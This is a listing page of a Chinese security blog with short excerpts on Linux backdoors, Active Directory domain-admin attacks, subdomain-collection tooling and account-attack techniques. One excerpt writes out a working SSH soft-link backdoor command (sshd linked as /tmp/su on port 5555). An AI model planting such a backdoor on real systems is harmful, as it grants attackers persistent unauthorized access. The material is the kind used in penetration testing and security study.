终于明白' blog|关注信息安全-最新发布-第3页

终于明白' blog|关注信息安全

欢迎光临
一直在努力

【东京不太热】 Linux经典后门的探究

今天在搜索关于Linux下的后门姿势时,发现一条命令如下: 软链接后门: Default 1 ln –sf /usr/sbin/sshd /tmp/su; /tmp/su –oPort=5555; 经典后门。直接对s...

最新发布 第3页

部分文章收集整理,个人收集学习用,涉及版权利益请联系删除 ⊙﹏⊙‖
从外部Active Directory获取域管理员-终于明白' blog|关注信息安全
转载

从外部Active Directory获取域管理员

 这是我在博客发的第一篇非web类的博文。我曾是一名Web开发人员,我对信息安全的兴趣也从 web 开始。从最初的兼职到如今的全职,活动目录(Active Directory)测试已成为我最喜欢的渗透测试类型。 这篇文章是关于我在今年早些...

安全工具源码剖析之子域名收集-终于明白' blog|关注信息安全
转载

安全工具源码剖析之子域名收集

 *本文原创作者:cat01,本文属FreeBuf原创奖励计划,未经许可禁止转载 面向对象:喜欢自己制作安全工具的新手 依赖:python2.7,requests,jinja2 参考项目:theHarvester 关注点:上千star的开...

挖洞思路 | 账号攻击的几种常见手法-终于明白' blog|关注信息安全
转载

挖洞思路 | 账号攻击的几种常见手法

 web 安全事件中,账号,通常是呈现给攻击者的第一接触点,与账号相关的功能若存在缺陷,攻击者可以此获取关键信息和重要功能,如,登录失败的报错信息可判断出是否因账号不存在所致,可被利用枚举有效账号,比如,登录试错无次数限制,可导致暴破密码...